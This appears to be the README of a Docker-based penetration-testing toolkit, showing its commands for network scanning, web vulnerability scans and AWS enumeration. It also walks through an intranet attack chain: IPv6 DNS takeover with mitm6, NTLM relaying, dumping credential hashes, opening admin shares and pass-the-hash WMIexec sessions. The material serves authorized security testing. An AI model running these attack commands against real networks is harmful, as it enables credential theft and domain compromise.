The purpose of the project is to make it easier to perform penetration testing by wrapping up various important commands into bash scripts.
Note: This repository was created with Advanced Users in mind, it is not very beginner friendly
- OWASP Zap
- NMAP
- Crackmapexec
- mitm6
- masscan
- rdp-sec-check.pl
- nuclei
- Docker
To build the image execute the following command at the root of the repo:
docker-compose build
IMPORTANT INFORMATION
Throughout this repository, we refer to "list_of_ips". To pass a list of IPs to any command, create a text file in the directory from which the docker command will be run. Ensure that you list one IP per line in the text-file, for example.
198.1.2.220
198.1.3.221
Then you can pass the file name as command line argument to the tool.
Output from the docker container will either be written to log files your current working directory, or sent to stdout and displayed in your CLI.
Output File Name: dc_anonymous_enumeration_results
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
extract_info_dc 192.168.1.159
Example of attempting to extract information from a list of Domain Controllers:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
extract_info_dc target_list
Output File Name: ssh_audit_results
Example of running ssh-audit against an IP address:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
ssh_audit 192.168.1.250
Example of running ssh-audit against a list of IP addresses:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
ssh_audit target_list
Output File Name: nuclei_results
Example of running nuclei against a single url using the http templates:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
nuclei https://xxxx.xx.om -t http/
Example of running nuclei against a list of urls using the http templates:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
nuclei target_list -t http/
Output File Name: masscan_raw_results
Example of running masscan against an IP address and a single port:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
masscan 192.168.1.250 \-p80
Example of running masscan against a list of IP addresses and all ports:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
masscan target_list \-p0\-65535
Output File Name: zap_processed_results_.json
To run zap against a url, run the following command, replacing the url with the target url. The results will be outputted to whatever directory you specify.
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
zap_vuln_scan https://yourtarget.com/
To run Zap against a list of URLs, place the urls in file named urls.txt in the PWD
with each url
on a new line (the last line must be terminated with a new line). Run:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
zap_vuln_scan your_list.txt
Output File Name: nmap_raw_results
Example of running NMAP's vulnerability scan against an IP address:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
nmap_vuln_scan 000.00.000.000
To run NMAP's vulnerability scan against a list of ip addresses, place
the list in a file named ips.txt in the PWD
with each IP address on a new line
(the last line must be terminated with a new line).
Run:
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
nmap_vuln_scan your_list.txt
Output File Names: Multiple files with .log
extensions
All web application scans can be run through an optional proxy server such as burpsuite. If no proxy is being used, the option can be ignored.
docker run --rm --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
run_web_app_tests target_ip_address_or_list_of_ips optional_proxy_address
Requirements for a successful exploit using this method
- SMB signing must NOT be required
- IPv6 must be enabled and ideally un-managed
- The attacker must be located on the local network of victims
Output: CLI
screen -S tshark -d -m docker run -it --rm --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
check_for_ipv6_traffic network_interface to listen on
You can view/interact with the above screen with the command:
screen -r tshark
Output: CLI
docker run --rm --network host -it -v "$(pwd)":/RESULTS berylliumsec/orionops:latest check_if_smb_signing_is_required smb_targets.txt
The above command expects that you have a list of targets on each line in your file like so:
198.1.2.220
198.1.3.221
Output: CLI
If Ipv6 is not being actively managed by a DNS and DHCP server and IPv6 packets are flowing then we can likely compromise this network by setting up a DNS server and DHCP server for IPv6. It is worth noting that according to RFC3484
IPv6 will be preferred over IPv4 which means that once IPv6 is being managed, nodes on the network will send packets via IPv6 as opposed to IPV4.
By default, windows hosts will send a DHCP discovery packet to try to discover DHCP servers and we will take advantage of this by responding using mitm6
screen -S mitm6 -d -m docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
start_mitm6 local_network_interface target_domain_name
You can view/interact with the above screen with the command:
screen -r mitm6
screen -S ipv6_relay -d -m docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
start_ntlm_relay_ipv6 target_ip_address_or_list_of_ips
You can view/interact with the above screen with the command:
screen -r ipv6_relay
You can check if SMB sessions have been created successfully by resuming the relay_ipv6
screen and running the socks
command
If SMB sessions have been created, you can perform a number of actions going forward using proxychains:
- Dumping hashes
The domain/account used in the command below can be retrieved by resuming the relay_ipv6
screen (see above) and
running the socks
command
Output: CLI
```bash
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest dump_creds DOMAIN/Account@x.x.x.x
```
- List SMB shares
Output: CLI
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest list_smb_shares ip_address_of_target DOMAIN\\Account
- Accessing SMB shares
Output: CLI
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest access_smb \\\\ip_address_of_target\\c$ DOMAIN\\Account
- Passing hashes for a WMIexec session
Output: CLI
NOTE: username must be in lowercase
docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest pass_hashes_wmi_exec hashes username@x.x.x.x
Output: CLI
screen -S responder -d -m docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
start_responder local_network_interface
You can interact with the above screen with the command:
screen -r responder
screen -S ipv4_relay -d -m docker run --rm -it --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
start_nltm_relay_ipv4 target_ip_address_or_list_of_ips
You can interact with the above screen with the command:
screen -r ipv4_relay
Output File Name: smb_null_session_results
docker run --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
check_and_exploit_null_smb_sessions target_ip_address_or_list_of_ips
Output: CLI
docker run --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
list_iscsi_targets target_ip_address_or_list_of_target_ips
Output: CLI
docker run --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
test_unauthenticated_iscsi_sessions target_ip_address_or_list_of_target_ips iscsi_target
Output File Name: aws_resources.json
Change the region as needed, AWS credentials must already be exported into your ENV
docker run --network host --env-file <(env | grep -E '^AWS_') -v "$(pwd)":/RESULTS berylliumsec/orionops:latest discover_aws_services us-east-1
Output File Name: supported_ciphers
docker run --network host --env-file <(env | grep -E '^AWS_') -v "$(pwd)":/RESULTS berylliumsec/orionops:latest enumerate_supported_ciphers PORT IPADDRESS_OR_URL
Output File Name: targetipaddress-rdp-check-results
docker run --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest test_open_relay IP_ADDRESS_OR_TEXT_CONTAINING_LIST_OF_IPS SENDER_ADDRESS RECIPIENT_ADDRESS
Output File Name: targetipaddress-rdp-check-results
docker run --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest check_rdp
Resolve IPs to FQDNS
sudo docker run --init --rm -v "$(pwd)":/RESULTS berylliumsec/orionops:latest nmap -sn 192.168.1.0/24 | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
Output File Name: dns_resolution.log
docker run --network host -v "$(pwd)":/RESULTS berylliumsec/orionops:latest \
resolve_fqdn target_ip_address_or_list_of_target_ips
Assume role with MFA
. ./assume_role_with_mfa arn:aws:iam::XXXXXXX:role/assume_role_test session_name arn:aws:iam::xxxxxxx:mfa/xxxx 0000(your_mfa_code)
Assume role without MFA
. ./assume_role_with_mfa arn:aws:iam::XXXXXXX:role/assume_role_test session_name
Get Session Token and Assume Role
. ./get_session_token arn:aws:iam::XXXXXX:mfa/xxxx 0000(your_mfa_code)
All log files will be placed in the directory from which you run the docker container.